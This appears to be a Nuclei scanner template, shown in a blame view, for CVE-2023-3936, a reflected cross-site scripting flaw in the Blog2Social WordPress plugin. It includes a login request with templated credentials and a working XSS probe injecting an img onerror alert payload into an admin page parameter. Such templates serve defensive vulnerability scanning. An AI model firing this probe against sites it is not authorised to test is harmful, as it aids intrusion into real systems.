nuclei-templates/http/cves/2023/CVE-2023-3936.yaml

59 lines
2.2 KiB
YAML
Raw Normal View History

2023-08-23 16:25:51 +00:00
id: CVE-2023-3936
info:
2023-08-23 17:06:12 +00:00
name: Blog2Social < 7.2.1 - Cross-Site Scripting
2023-08-23 16:25:51 +00:00
author: luisfelipe146
severity: medium
2023-08-23 17:06:12 +00:00
description: |
The Blog2Social WordPress plugin before 7.2.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 11:43:37 +00:00
remediation: |
Update to the latest version of the Blog2Social plugin (7.2.1) or apply the vendor-provided patch to mitigate this vulnerability.
2023-08-23 16:25:51 +00:00
reference:
- https://wpscan.com/vulnerability/6d09a5d3-046d-47ef-86b4-c024ea09dc0f
2023-08-23 17:06:12 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2023-3936
2023-08-23 16:25:51 +00:00
classification:
2023-08-31 11:46:18 +00:00
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
2023-08-23 16:25:51 +00:00
cve-id: CVE-2023-3936
2023-08-31 11:46:18 +00:00
cwe-id: CWE-79
epss-score: 0.00064
epss-percentile: 0.26298
2023-09-06 11:43:37 +00:00
cpe: cpe:2.3:a:adenion:blog2social:*:*:*:*:*:wordpress:*:*
2023-08-23 16:25:51 +00:00
metadata:
verified: true
2023-09-06 11:43:37 +00:00
max-request: 2
2023-08-31 11:46:18 +00:00
vendor: adenion
product: blog2social
2023-09-06 11:43:37 +00:00
framework: wordpress
2023-12-05 09:50:33 +00:00
tags: wpscan,cve,cve2023,wordpress,wp-plugin,xss,authenticated,adenion
2023-08-23 16:25:51 +00:00
2023-08-23 17:17:11 +00:00
http:
2023-08-23 16:25:51 +00:00
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2023-08-23 17:08:12 +00:00
log={{username}}&pwd={{password}}&wp-submit=Log+In
2023-08-23 16:25:51 +00:00
- |
2023-08-23 17:06:12 +00:00
GET /wp-admin/admin.php?page=blog2social&origin=publish_post&deletePostStatus=success&deletedPostsNumber=1<img+src+onerror%3Dalert%28document.domain%29> HTTP/1.1
2023-08-23 16:25:51 +00:00
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
2023-08-23 17:06:12 +00:00
words:
- "Deleted 1<img src onerror=alert(document.domain)> posts"
2023-08-23 16:25:51 +00:00
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4b0a00483046022100d20ddec85dbb7741e3224182de80c8c2c004d80e30540290cf59809037004366022100bc0d6be24253100739c243a7e5fa080da025ff3bf4c40bef526fa20c8ae19109:922c64590222798bb761d5b6d8e72950